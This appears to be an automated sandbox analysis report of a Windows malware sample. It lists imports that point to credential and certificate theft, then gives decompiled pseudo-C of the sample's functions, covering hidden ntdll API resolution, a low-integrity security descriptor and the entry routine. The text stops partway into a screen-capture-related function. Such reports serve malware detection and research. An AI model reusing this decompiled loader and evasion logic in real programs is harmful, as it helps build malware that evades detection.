SHLWAPI.dll	PathIsURLW, PathRenameExtensionW, wvnsprintfA, StrCmpNIA, PathMatchSpecW, PathUnquoteSpacesW, PathAddExtensionW, PathCombineW, SHDeleteKeyW, PathSkipRootW, SHDeleteValueW, PathAddBackslashW, PathFindFileNameW, PathIsDirectoryW, wvnsprintfW, UrlUnescapeA, PathQuoteSpacesW, StrStrIW, StrStrIA, StrCmpNIW, PathRemoveBackslashW, PathRemoveFileSpecW
SHELL32.dll	CommandLineToArgvW, SHGetFolderPathW, ShellExecuteW
Secur32.dll	GetUserNameExW
ole32.dll	StringFromGUID2, CLSIDFromString, CoUninitialize, CoCreateInstance, CoInitializeEx
GDI32.dll	SetViewportOrgEx, GdiFlush, CreateDIBSection, SetRectRgn, SaveDC, RestoreDC, DeleteDC, GetDeviceCaps, DeleteObject, SelectObject, GetDIBits, CreateCompatibleBitmap, CreateCompatibleDC
WS2_32.dll	recv, sendto, getsockname, select, getaddrinfo, recvfrom, getpeername, accept, WSAEventSelect, WSAIoctl, connect, WSAAddressToStringW, WSAStartup, shutdown, setsockopt, bind, socket, WSASetLastError, listen, freeaddrinfo, WSAGetLastError, WSASend, closesocket, send
CRYPT32.dll	PFXExportCertStoreEx, CertDuplicateCertificateContext, CertEnumCertificatesInStore, CertCloseStore, CertOpenSystemStoreW, CertDeleteCertificateFromStore, PFXImportCertStore, CryptUnprotectData
WININET.dll	InternetQueryOptionA, InternetSetOptionA, InternetQueryOptionW, HttpAddRequestHeadersW, InternetSetStatusCallbackW, GetUrlCacheEntryInfoW, InternetOpenA, HttpAddRequestHeadersA, HttpOpenRequestA, InternetCrackUrlA, InternetConnectA, HttpSendRequestA, HttpSendRequestW, InternetReadFile, InternetReadFileExA, InternetQueryDataAvailable, HttpSendRequestExW, HttpQueryInfoA, HttpSendRequestExA, InternetCloseHandle
OLEAUT32.dll	VariantInit, SysAllocString, VariantClear, SysFreeString
NETAPI32.dll	NetApiBufferFree, NetUserEnum, NetUserGetInfo

Network Behavior

No network behavior found

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

System Behavior

Analysis Process: K8nV75e45o.exe PID: 3924 Parent PID: 5616

General

Start time:	03:47:07
Start date:	28/03/2021
Path:	C:\Users\user\Desktop\K8nV75e45o.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\K8nV75e45o.exe'
Imagebase:	0x400000
File size:	141824 bytes
MD5 hash:	B4BD8726C7A17ED5D3E99069A8E5872C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: K8nV75e45o.exe PID: 3924 Parent PID: 5616 K8nV75e45o.exeCOMMON

Executed Functions

Function 0040635A, Relevance: 42.2, APIs: 15, Strings: 9, Instructions: 229
libraryloadermemoryCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E0040635A(signed int** __ecx, void* __edx, signed char _a4) {
				char _v922;
				char _v1036;
				char _v1428;
				char _v1448;
				intOrPtr _v1456;
				intOrPtr _v1460;
				signed int _v1464;
				intOrPtr _v1468;
				signed int** _v1472;
				struct HINSTANCE__* _v1476;
				void* __edi;
				void* __esi;
				signed int _t40;
				struct HINSTANCE__* _t43;
				struct HINSTANCE__* _t47;
				_Unknown_base(*)()* _t53;
				void* _t54;
				signed int _t57;
				void** _t58;
				void** _t60;
				signed int _t62;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				void* _t73;
				intOrPtr _t77;
				signed int _t78;
				signed int _t79;
				signed int _t80;
				struct HINSTANCE__* _t81;
				int _t83;
				signed int _t86;
				void* _t89;
				signed int* _t91;
				signed int _t95;
				WCHAR* _t97;
				void* _t98;
				signed int* _t100;
				void* _t109;
				void* _t110;
				void* _t111;
				void* _t112;

				_t89 = __edx;
				_t87 = __ecx;
				_t95 = _a4 & 0x00000001;
				_v1464 = _t95;
				if(_t95 != 0) {
					_t83 = 0;
					__eflags = 0;
				} else {
					_t83 = 0;
					 *0x422940 = 0;
				}
				_t91 = E00406015();
				 *0x422958 = _t91;
				if(_t91 == _t83) {
					L27:
					_t40 = 0;
				} else {
					if(_t95 != _t83) {
						_v1464 = E00405F4F(_t87, _t89, _t91, "GetProcAddress");
						_v1464 = E00405F4F(_t87, _t89, _t91, "LoadLibraryA");
						_t43 =  *0x422954; // 0x400000
						_t5 = _t43 + 0x3c; // 0xd8
						_v1476 = _t43;
						_t87 =  *_t5 + _t43 + 0x80;
						__eflags = _v1464 - _t83;
						if(_v1464 == _t83) {
							goto L21;
						} else {
							__eflags = _v1460 - _t83;
							if(_v1460 == _t83) {
								goto L21;
							} else {
								_t91 =  *_t87;
								__eflags = _t91 - _t83;
								if(_t91 <= _t83) {
									goto L21;
								} else {
									__eflags = _t87[1] - 0x14;
									if(_t87[1] <= 0x14) {
										goto L21;
									} else {
										_t91 = _t91 + _t43;
										__eflags =  *_t91 - _t83;
										if( *_t91 == _t83) {
											goto L21;
										} else {
											while(1) {
												_t77 = _v1456(_t91[3] + _v1468);
												_v1456 = _t77;
												__eflags = _t77 - _t83;
												if(_t77 == _t83) {
													goto L27;
												}
												_t100 = _v1472 +  *_t91;
												_t86 = _v1472 + _t91[4];
												while(1) {
													_t78 =  *_t100;
													__eflags = _t78;
													if(__eflags == 0) {
														break;
													}
													if(__eflags >= 0) {
														_t87 = _v1472;
														_t79 =  &(_v1472[0]) + _t78;
													} else {
														_t79 = _t78 & 0x0000ffff;
													}
													_t80 = _v1464(_v1456, _t79);
													__eflags = _t80;
													if(_t80 == 0) {
														goto L27;
													} else {
														 *_t86 = _t80;
														_t100 =  &(_t100[1]);
														_t86 = _t86 + 4;
														__eflags = _t86;
														continue;
													}
													goto L47;
												}
												_t91 =  &(_t91[5]);
												_t83 = 0;
												__eflags =  *_t91;
												if( *_t91 != 0) {
													continue;
												} else {
													goto L21;
												}
												goto L47;
											}
											goto L27;
										}
									}
								}
							}
						}
					} else {
						_t81 = GetModuleHandleW(_t83);
						 *0x422954 = _t81;
						if(_t81 == _t83) {
							goto L27;
						} else {
							L21:
							_t97 =  &_v1448;
							E004159A4(0xe5, _t97);
							_t47 = GetModuleHandleW(_t97);
							 *0x42295c = _t47;
							if(_t47 == _t83) {
								goto L27;
							} else {
								_t98 = GetProcAddress;
								 *0x422960 = GetProcAddress(_t47, "NtCreateThread");
								 *0x422964 = GetProcAddress( *0x42295c, "NtCreateUserProcess");
								 *0x422968 = GetProcAddress( *0x42295c, "NtQueryInformationProcess");
								 *0x42296c = GetProcAddress( *0x42295c, "RtlUserThreadStart");
								 *0x422970 = GetProcAddress( *0x42295c, "LdrLoadDll");
								_t53 = GetProcAddress( *0x42295c, "LdrGetDllHandle");
								 *0x422974 = _t53;
								_t109 =  *0x422960 - _t83; // 0x77e599e0
								if(_t109 != 0) {
									L24:
									_t111 =  *0x422968 - _t83; // 0x77e59670
									if(_t111 == 0) {
										goto L27;
									} else {
										_t112 =  *0x422970 - _t83; // 0x77e27840
										if(_t112 == 0 || _t53 == _t83) {
											goto L27;
										} else {
											_t54 = HeapCreate(_t83, 0x80000, _t83); // executed
											 *0x423f34 = _t54;
											__eflags = _t54 - _t83;
											if(_t54 != _t83) {
												 *0x422833 = 1;
											} else {
												 *0x423f34 = GetProcessHeap();
												 *0x422833 = 0;
											}
											 *0x423568 = _t83;
											 *0x422832 = 0;
											InitializeCriticalSection(0x4230fc);
											 *0x423114 = _t83; // executed
											__imp__#115(0x202,  &_v1428); // executed
											_t57 = E0040604F(_a4, _t87, _t91, _t98);
											__eflags = _t57;
											if(_t57 == 0) {
												goto L27;
											} else {
												__eflags = _v1472 - _t83;
												if(_v1472 != _t83) {
													L34:
													_t58 = E00417A38(_t87, 0xffffffff, 0x422950);
													 *0x422944 = _t58;
													__eflags = _t58 - _t83;
													if(_t58 == _t83) {
														goto L27;
													} else {
														 *0x422948 = GetLengthSid( *_t58);
														_t60 =  *0x422944; // 0x0
														 *0x42294c = E004177D0( *_t60, _t59);
														_t62 = E004060CE(_t61, _a4);
														__eflags = _t62;
														if(_t62 == 0) {
															goto L27;
														} else {
															 *0x422bb0 = GetCurrentProcessId();
															 *0x422bb4 = _t83;
															__eflags = _v1472 - _t83;
															if(_v1472 != _t83) {
																_t64 = 1;
															} else {
																_t64 = E00406130();
															}
															__eflags = _t64;
															if(_t64 == 0) {
																goto L27;
															} else {
																__eflags = _v1472 - _t83;
																if(_v1472 == _t83) {
																	E00406A39( &_v1036);
																	_t87 = 0x422dae;
																	E0041AA7A(0x422dae, 0x422bb8,  *0x42294c,  &_v922, _t83);
																}
																_t65 = E00406182(_a4);
																__eflags = _t65;
																if(_t65 == 0) {
																	goto L27;
																} else {
																	__eflags = _a4 & 0x00000002;
																	 *0x423f44 = _t83;
																	 *0x4223a8 = 0;
																	 *0x4227d0 = 0;
																	 *0x423058 = 0;
																	 *0x422ff0 = 0;
																	 *0x423fc8 = 0;
																	 *0x423f60 = 0;
																	if(__eflags == 0) {
																		_t67 = 1;
																	} else {
																		_t67 = E00406239(_t87, _t89, __eflags);
																	}
																	__eflags = _t67;
																	_t38 = _t67 != 0;
																	__eflags = _t38;
																	_t40 = _t67 & 0xffffff00 | _t38;
																}
															}
														}
													}
												} else {
													_t73 = CreateEventW(0x422978, 1, _t83, _t83);
													 *0x422e08 =  *0x422e08 | 0xffffffff;
													 *0x422e04 = _t73;
													__eflags = _t73 - _t83;
													if(_t73 == _t83) {
														goto L27;
													} else {
														goto L34;
													}
												}
											}
										}
									}
								} else {
									_t110 =  *0x422964 - _t83; // 0x77e5a120
									if(_t110 == 0) {
										goto L27;
									} else {
										goto L24;
									}
								}
							}
						}
					}
				}
				L47:
				return _t40;
			}

0x0040635a
0x0040635a
0x0040636b
0x0040636f
0x00406373
0x0040637f
0x0040637f
0x00406375
0x00406375
0x00406377
0x00406377
0x00406386
0x00406388
0x00406390
0x00406515
0x00406515
0x00406396
0x00406398
0x004063c2
0x004063cb
0x004063cf
0x004063d4
0x004063d7
0x004063db
0x004063e2
0x004063e6
0x00000000
0x004063e8
0x004063e8
0x004063ec
0x00000000
0x004063ee
0x004063ee
0x004063f0
0x004063f2
0x00000000
0x004063f4
0x004063f4
0x004063f8
0x00000000
0x004063fa
0x004063fa
0x004063fc
0x004063fe
0x00000000
0x00406400
0x00406400
0x00406408
0x0040640c
0x00406410
0x00406412
0x00000000
0x00000000
0x0040641d
0x00406421
0x00406451
0x00406451
0x00406453
0x00406455
0x00000000
0x00000000
0x00406427
0x00406430
0x00406434
0x00406429
0x00406429
0x00406429
0x0040643d
0x00406441
0x00406443
0x00000000
0x00406449
0x00406449
0x0040644b
0x0040644e
0x0040644e
0x00000000
0x0040644e
0x00000000
0x00406443
0x00406457
0x0040645a
0x0040645c
0x0040645e
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040645e
0x00000000
0x00406400
0x004063fe
0x004063f8
0x004063f2
0x004063ec
0x0040639a
0x0040639b
0x004063a1
0x004063a8
0x00000000
0x004063ae
0x00406460
0x00406460
0x00406469
0x00406471
0x00406477
0x0040647e
0x00000000
0x00406484
0x00406484
0x0040649d
0x004064af
0x004064c1
0x004064d3
0x004064e5
0x004064ea
0x004064ec
0x004064f1
0x004064f7
0x00406501
0x00406501
0x00406507
0x00000000
0x00406509
0x00406509
0x0040650f
0x00000000
0x0040651c
0x00406523
0x00406529
0x0040652e
0x00406530
0x00406546
0x00406532
0x00406538
0x0040653d
0x0040653d
0x00406552
0x00406558
0x0040655f
0x0040656f
0x00406575
0x0040657e
0x00406583
0x00406585
0x00000000
0x00406587
0x00406587
0x0040658b
0x004065b0
0x004065b7
0x004065bc
0x004065c1
0x004065c3
0x00000000
0x004065c9
0x004065d1
0x004065d7
0x004065e6
0x004065eb
0x004065f0
0x004065f2
0x00000000
0x004065f8
0x004065fe
0x00406603
0x00406609
0x0040660d
0x00406616
0x0040660f
0x0040660f
0x0040660f
0x00406618
0x0040661a
0x00000000
0x00406620
0x00406620
0x00406624
0x0040662d
0x00406641
0x00406650
0x00406650
0x00406658
0x0040665d
0x0040665f
0x00000000
0x00406665
0x00406667
0x0040666b
0x00406671
0x00406677
0x0040667d
0x00406683
0x00406689
0x0040668f
0x00406695
0x0040669e
0x00406697
0x00406697
0x00406697
0x004066a0
0x004066a2
0x004066a2
0x004066a2
0x004066a2
0x0040665f
0x0040661a
0x004065f2
0x0040658d
0x00406596
0x0040659c
0x004065a3
0x004065a8
0x004065aa
0x00000000
0x00000000
0x00000000
0x00000000
0x004065aa
0x0040658b
0x00406585
0x0040650f
0x004064f9
0x004064f9
0x004064ff
0x00000000
0x00000000
0x00000000
0x00000000
0x004064ff
0x004064f7
0x0040647e
0x004063a8
0x00406398
0x004066a5
0x004066ab

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000000), ref: 0040639B
GetModuleHandleW.KERNEL32(?,LoadLibraryA,GetProcAddress,?,?,00000000), ref: 00406471
GetProcAddress.KERNEL32(00000000,NtCreateThread), ref: 00406490
GetProcAddress.KERNEL32(NtCreateUserProcess), ref: 004064A2
GetProcAddress.KERNEL32(NtQueryInformationProcess), ref: 004064B4
GetProcAddress.KERNEL32(RtlUserThreadStart), ref: 004064C6
GetProcAddress.KERNEL32(LdrLoadDll), ref: 004064D8
GetProcAddress.KERNEL32(LdrGetDllHandle), ref: 004064EA
HeapCreate.KERNELBASE(00000000,00080000,00000000,?,?,00000000), ref: 00406523
GetProcessHeap.KERNEL32(?,?,00000000), ref: 00406532
InitializeCriticalSection.KERNEL32(004230FC,?,?,00000000), ref: 0040655F
WSAStartup.WS2_32(00000202,?), ref: 00406575
CreateEventW.KERNEL32(00422978,00000001,00000000,00000000,?,?,00000000), ref: 00406596
GetLengthSid.ADVAPI32(00000000,000000FF,00422950,?,?,00000000), ref: 004065CB
GetCurrentProcessId.KERNEL32(00000000,00000000,00000000,?,?,00000000), ref: 004065F8

Strings

LoadLibraryA, xrefs: 004063BD
LdrGetDllHandle, xrefs: 004064DA
RtlUserThreadStart, xrefs: 004064B6
NtCreateUserProcess, xrefs: 00406492
NtCreateThread, xrefs: 0040648A
NtQueryInformationProcess, xrefs: 004064A4
LdrLoadDll, xrefs: 004064C8
@xw, xrefs: 004064E5, 00406509
GetProcAddress, xrefs: 004063B3

Memory Dump Source

Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$CreateHandleHeapModuleProcess$CriticalCurrentEventInitializeLengthSectionStartup
String ID: @xw$GetProcAddress$LdrGetDllHandle$LdrLoadDll$LoadLibraryA$NtCreateThread$NtCreateUserProcess$NtQueryInformationProcess$RtlUserThreadStart
API String ID: 3091071419-944592941
Opcode ID: d13bfee092ff9dd684906568a8840a59710a497b4d0f9dcb8b10c10437af5aef
Instruction ID: 6061dff1ceb38a6b35a5de2894ae39c2373e96fa1b1f37307c6c51b30cc65102
Opcode Fuzzy Hash: d13bfee092ff9dd684906568a8840a59710a497b4d0f9dcb8b10c10437af5aef
Instruction Fuzzy Hash: 529194B1701341AFCB20EF60EE846167BA4BB44308F51043FE446B72A1D7788966CF5E

Uniqueness

Uniqueness Score: -1.00%

Function 00419A10, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E00419A10(struct _SECURITY_DESCRIPTOR* __edi, intOrPtr* __esi) {
				signed int _v8;
				struct _ACL* _v12;
				int _v16;
				int _v20;
				void** _t19;
				struct _SECURITY_DESCRIPTOR* _t28;
				intOrPtr* _t29;

				_t29 = __esi;
				_t28 = __edi;
				if(InitializeSecurityDescriptor(__edi, 1) == 0 || SetSecurityDescriptorDacl(__edi, 1, 0, 0) == 0) {
					return 0;
				} else {
					_t19 =  &_v8;
					__imp__ConvertStringSecurityDescriptorToSecurityDescriptorW(L"S:(ML;;NRNWNX;;;LW)", 1, _t19, 0); // executed
					if(_t19 == 0) {
						L6:
						_v8 = _v8 | 0xffffffff;
						L7:
						if(_t29 != 0) {
							 *_t29 = 0xc;
							 *(_t29 + 4) = _t28;
							 *((intOrPtr*)(_t29 + 8)) = 0;
						}
						return _v8;
					}
					_v12 = 0;
					if(GetSecurityDescriptorSacl(_v8,  &_v20,  &_v12,  &_v16) == 0 || SetSecurityDescriptorSacl(__edi, _v20, _v12, _v16) == 0) {
						LocalFree(_v8);
						goto L6;
					} else {
						goto L7;
					}
				}
			}

0x00419a10
0x00419a10
0x00419a22
0x00000000
0x00419a35
0x00419a36
0x00419a41
0x00419a49
0x00419a84
0x00419a84
0x00419a88
0x00419a8a
0x00419a8c
0x00419a92
0x00419a95
0x00419a95
0x00000000
0x00419a98
0x00419a5a
0x00419a65
0x00419a7e
0x00000000
0x00000000
0x00000000
0x00000000
0x00419a65

APIs

InitializeSecurityDescriptor.ADVAPI32(00422984,00000001,00000000,00406583,?,?,00000000), ref: 00419A1A
SetSecurityDescriptorDacl.ADVAPI32(00422984,00000001,00000000,00000000,?,?,00000000), ref: 00419A2B
ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,00000000,00000000), ref: 00419A41
GetSecurityDescriptorSacl.ADVAPI32(00000000,?,?,?,?,?,00000000), ref: 00419A5D
SetSecurityDescriptorSacl.ADVAPI32(00422984,?,?,?,?,?,00000000), ref: 00419A71
LocalFree.KERNEL32(00000000,?,?,00000000), ref: 00419A7E

Strings

S:(ML;;NRNWNX;;;LW), xrefs: 00419A3C

Memory Dump Source

Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: DescriptorSecurity$Sacl$ConvertDaclFreeInitializeLocalString
String ID: S:(ML;;NRNWNX;;;LW)
API String ID: 2050860296-820036962
Opcode ID: 97eb4743c3e229053cb5ca8b567ed8d45e8b51c9a39524f4e4168a2e678fcfe4
Instruction ID: 2c1b7b79a1242d3bd87dfcc850575d311915888ac4a3f362e099c32ffd8a9f28
Opcode Fuzzy Hash: 97eb4743c3e229053cb5ca8b567ed8d45e8b51c9a39524f4e4168a2e678fcfe4
Instruction Fuzzy Hash: 59114871A00249BFEB119FE48D85AEFBBBCBF00780F10446AF152F11A0D7758E849B29

Uniqueness

Uniqueness Score: -1.00%

Function 0041A9C4, Relevance: 10.6, APIs: 7, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E0041A9C4() {
				void* _t30;
				void* _t33;
				intOrPtr* _t35;
				void* _t36;
				void* _t39;
				void* _t41;

				_t39 = _t41 - 0x74;
				_t17 = _t39 - 0x260;
				 *((char*)(_t39 + 0x73)) = 0;
				__imp__SHGetFolderPathW(0, 0x24, 0, 0, _t17, _t33, _t36, _t30); // executed
				if(_t17 != 0) {
					L8:
					E004164D4(_t17,  *((intOrPtr*)(_t39 + 0x7c)), 0, 0x10);
				} else {
					PathAddBackslashW(_t39 - 0x260);
					_t35 = __imp__GetVolumeNameForVolumeMountPointW;
					while(1) {
						_t17 =  *_t35(_t39 - 0x260, _t39 - 0x58, 0x64); // executed
						if(_t17 != 0) {
							break;
						}
						PathRemoveBackslashW(_t39 - 0x260);
						if(PathRemoveFileSpecW(_t39 - 0x260) == 0) {
							goto L8;
						} else {
							PathAddBackslashW(_t39 - 0x260);
							continue;
						}
						goto L9;
					}
					if( *((short*)(_t39 - 0x44)) != 0x7b) {
						goto L8;
					} else {
						 *((short*)(_t39 + 8)) = 0;
						_t17 = _t39 - 0x44;
						__imp__CLSIDFromString(_t17,  *((intOrPtr*)(_t39 + 0x7c)));
						if(_t17 != 0) {
							goto L8;
						} else {
							 *((char*)(_t39 + 0x73)) = 1;
						}
					}
				}
				L9:
				return  *((intOrPtr*)(_t39 + 0x73));
			}

0x0041a9c5
0x0041a9d4
0x0041a9e0
0x0041a9e3
0x0041a9eb
0x0041aa62
0x0041aa68
0x0041a9ed
0x0041a9fa
0x0041a9fc
0x0041aa2b
0x0041aa38
0x0041aa3c
0x00000000
0x00000000
0x0041aa0b
0x0041aa20
0x00000000
0x0041aa22
0x0041aa29
0x00000000
0x0041aa29
0x00000000
0x0041aa20
0x0041aa43
0x00000000
0x0041aa45
0x0041aa4a
0x0041aa4e
0x0041aa52
0x0041aa5a
0x00000000
0x0041aa5c
0x0041aa5c
0x0041aa5c
0x0041aa5a
0x0041aa43
0x0041aa6d
0x0041aa77

APIs

SHGetFolderPathW.SHELL32(00000000,00000024,00000000,00000000,?,00000000,74B04EE0,00000000), ref: 0041A9E3
PathAddBackslashW.SHLWAPI(?), ref: 0041A9FA
PathRemoveBackslashW.SHLWAPI(?), ref: 0041AA0B
PathRemoveFileSpecW.SHLWAPI(?), ref: 0041AA18
PathAddBackslashW.SHLWAPI(?), ref: 0041AA29
GetVolumeNameForVolumeMountPointW.KERNELBASE(?,?,00000064), ref: 0041AA38
CLSIDFromString.OLE32(?,?), ref: 0041AA52

Memory Dump Source

Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: Path$Backslash$RemoveVolume$FileFolderFromMountNamePointSpecString
String ID:
API String ID: 613918483-0
Opcode ID: 289e17c043a25d8c47eb41dd3f9c7aedabca2c08cddb003256234e9f789300d9
Instruction ID: 101d448efc19f199e2cbf34b2f026e821729c82c8f4aca1c58aa0a73b138db12
Opcode Fuzzy Hash: 289e17c043a25d8c47eb41dd3f9c7aedabca2c08cddb003256234e9f789300d9
Instruction Fuzzy Hash: C411727190414CAADF20DBB0CD88EDB77ACAF08384F180466F515E3160E239DE98DF65

Uniqueness

Uniqueness Score: -1.00%

Function 0040728B, Relevance: 9.1, APIs: 6, Instructions: 83
sleepCOMMON

Download Yara Rule

C-Code - Quality: 100%

			_entry_(signed int __ecx, signed int __edx, void* __eflags, void* __fp0) {
				char _v5;
				int _v12;
				char _v16;
				char _v20;
				void* _t22;
				void* _t28;
				char _t29;
				char _t33;
				void* _t50;

				_t50 = __fp0;
				_t35 = __edx;
				_t34 = __ecx;
				_t33 = 0; // executed
				_t22 = E0040635A(__ecx, __edx, 0); // executed
				if(_t22 == 0) {
					L24:
					__eflags = _t33;
					_t21 = _t33 == 0;
					__eflags = _t21;
					ExitProcess(0 | _t21);
				}
				_v20 = 0;
				_v16 = 1;
				_v5 = 0;
				SetErrorMode(0x8007);
				_t28 = CommandLineToArgvW(GetCommandLineW(),  &_v12);
				if(_t28 == 0) {
					L19:
					_t29 = E00406F85(_t34, _t35, __eflags, _t50, _v20, _v16);
					L20:
					_t33 = _t29;
					L21:
					if(_t33 == 0 || ( *0x422940 & 0x00000002) == 0) {
						goto L24;
					} else {
						Sleep(0xffffffff);
						return _t29;
					}
				}
				_t35 = 0;
				if(_v12 <= 0) {
					L14:
					LocalFree(_t28);
					_t47 = _t33;
					if(_t33 == 0) {
						__eflags = _v5;
						if(__eflags == 0) {
							goto L19;
						}
						E00408490(_t35);
						_t29 = E0040945D();
						__eflags =  *0x422940 & 0x00000004;
						_t33 = _t29;
						if(( *0x422940 & 0x00000004) != 0) {
							_t29 = E00408309(0x422e10, 0);
						}
						goto L21;
					}
					_t29 = E00406D97(_t47);
					goto L20;
				} else {
					goto L3;
				}
				do {
					L3:
					_t34 =  *(_t28 + _t35 * 4);
					if(_t34 != 0 &&  *_t34 == 0x2d) {
						_t34 =  *(_t34 + 2) & 0x0000ffff;
						if(_t34 == 0x66) {
							_v20 = 1;
						} else {
							if(_t34 == 0x69) {
								_t33 = 1;
							} else {
								if(_t34 == 0x6e) {
									_v16 = 0;
								} else {
									if(_t34 == 0x76) {
										_v5 = 1;
									}
								}
							}
						}
					}
					_t35 = _t35 + 1;
				} while (_t35 < _v12);
				goto L14;
			}

0x0040728b
0x0040728b
0x0040728b
0x00407294
0x00407296
0x0040729d
0x00407377
0x00407379
0x0040737b
0x0040737b
0x0040737f
0x0040737f
0x004072a8
0x004072ab
0x004072af
0x004072b2
0x004072c3
0x004072cb
0x00407352
0x00407358
0x0040735d
0x0040735d
0x0040735f
0x00407361
0x00000000
0x0040736c
0x0040736e
0x00407376
0x00407376
0x00407361
0x004072d1
0x004072d6
0x00407317
0x00407318
0x0040731e
0x00407320
0x00407329
0x0040732d
0x00000000
0x00000000
0x0040732f
0x00407334
0x00407339
0x00407340
0x00407342
0x0040734b
0x0040734b
0x00000000
0x00407342
0x00407322
0x00000000
0x00000000
0x00000000
0x00000000
0x004072d8
0x004072d8
0x004072d8
0x004072dd
0x004072e5
0x004072ec
0x0040730d
0x004072ee
0x004072f1
0x00407309
0x004072f3
0x004072f6
0x00407303
0x004072f8
0x004072fb
0x004072fd
0x004072fd
0x004072fb
0x004072f6
0x004072f1
0x004072ec
0x00407311
0x00407312
0x00000000

APIs

Part of subcall function 0040635A: GetModuleHandleW.KERNEL32(00000000,?,?,00000000), ref: 0040639B
Part of subcall function 0040635A: GetModuleHandleW.KERNEL32(?,LoadLibraryA,GetProcAddress,?,?,00000000), ref: 00406471
Part of subcall function 0040635A: GetProcAddress.KERNEL32(00000000,NtCreateThread), ref: 00406490
Part of subcall function 0040635A: GetProcAddress.KERNEL32(NtCreateUserProcess), ref: 004064A2
Part of subcall function 0040635A: GetProcAddress.KERNEL32(NtQueryInformationProcess), ref: 004064B4
Part of subcall function 0040635A: GetProcAddress.KERNEL32(RtlUserThreadStart), ref: 004064C6
Part of subcall function 0040635A: GetProcAddress.KERNEL32(LdrLoadDll), ref: 004064D8
Part of subcall function 0040635A: GetProcAddress.KERNEL32(LdrGetDllHandle), ref: 004064EA

SetErrorMode.KERNEL32(00008007,00000000), ref: 004072B2
GetCommandLineW.KERNEL32(?), ref: 004072BC
CommandLineToArgvW.SHELL32(00000000), ref: 004072C3
LocalFree.KERNEL32(00000000), ref: 00407318
Sleep.KERNEL32(000000FF,?,00000001), ref: 0040736E
ExitProcess.KERNEL32 ref: 0040737F

Memory Dump Source

Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$CommandHandleLineModule$ArgvErrorExitFreeLocalModeProcessSleep
String ID:
API String ID: 1184560534-0
Opcode ID: d6b0bcc6428c41cce2b6a2ea47eb37e0ec7c7f0befa63b34e4b03ffa33df2e78
Instruction ID: f507415d81f08f02b32219bc7ce47ddd3f9e13d2743c74e6488ce8134c9030b9
Opcode Fuzzy Hash: d6b0bcc6428c41cce2b6a2ea47eb37e0ec7c7f0befa63b34e4b03ffa33df2e78
Instruction Fuzzy Hash: E221D520E4C24596EB2567B589187AE3B546F02308F0844BFED41B72E2D77D6845E71B

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0040F20F, Relevance: 82.6, APIs: 27, Strings: 20, Instructions: 389
libraryloaderwindowCOMMON

Download Yara Rule

C-Code - Quality: 38%

			E0040F20F(WCHAR* _a4, char _a8, signed short _a12) {
				struct HINSTANCE__* _v12;
				struct HINSTANCE__* _v16;
				struct HINSTANCE__* _v20;
				_Unknown_base(*)()* _v24;
				void* _v28;
				void* _v32;
				struct HDC__* _v36;
				_Unknown_base(*)()* _v40;
				_Unknown_base(*)()* _v44;
				struct tagPOINT _v52;
				_Unknown_base(*)()* _v56;
				struct HINSTANCE__* _v60;
				_Unknown_base(*)()* _v64;
				_Unknown_base(*)()* _v68;
				_Unknown_base(*)()* _v72;
				_Unknown_base(*)()* _v76;
				_Unknown_base(*)()* _v80;
				_Unknown_base(*)()* _v84;
				_Unknown_base(*)()* _v88;
				struct HINSTANCE__* _v92;
				struct HINSTANCE__* _v96;
				struct HINSTANCE__* _v100;
				char _v104;
				_Unknown_base(*)()* _v108;
				intOrPtr _v112;
				char _v116;
				_Unknown_base(*)()* _v120;
				char _v148;
				signed int _v152;
				struct _ICONINFO _v172;
				char _v188;
				struct HINSTANCE__* _t169;
				_Unknown_base(*)()* _t176;
				struct HINSTANCE__* _t181;
				_Unknown_base(*)()* _t182;
				struct HINSTANCE__* _t183;
				_Unknown_base(*)()* _t191;
				struct HDC__* _t197;
				struct HICON__* _t199;
				signed int _t200;
				intOrPtr _t202;
				intOrPtr _t204;
				void* _t206;
				void* _t223;
				intOrPtr* _t224;
				void* _t239;
				void* _t248;
				unsigned int _t260;
				intOrPtr* _t262;
				signed short _t263;
				intOrPtr _t264;
				WCHAR** _t265;
				intOrPtr _t268;
				signed int _t269;
				signed int _t272;
				void* _t275;

				_v32 = 0;
				_v60 = 0;
				_v16 = 0;
				_v104 = 1;
				_v100 = 0;
				_v96 = 0;
				_v92 = 0;
				_t169 = LoadLibraryA("gdiplus.dll");
				_v20 = _t169;
				_v24 = GetProcAddress(_t169, "GdiplusStartup");
				_v80 = GetProcAddress(_v20, "GdiplusShutdown");
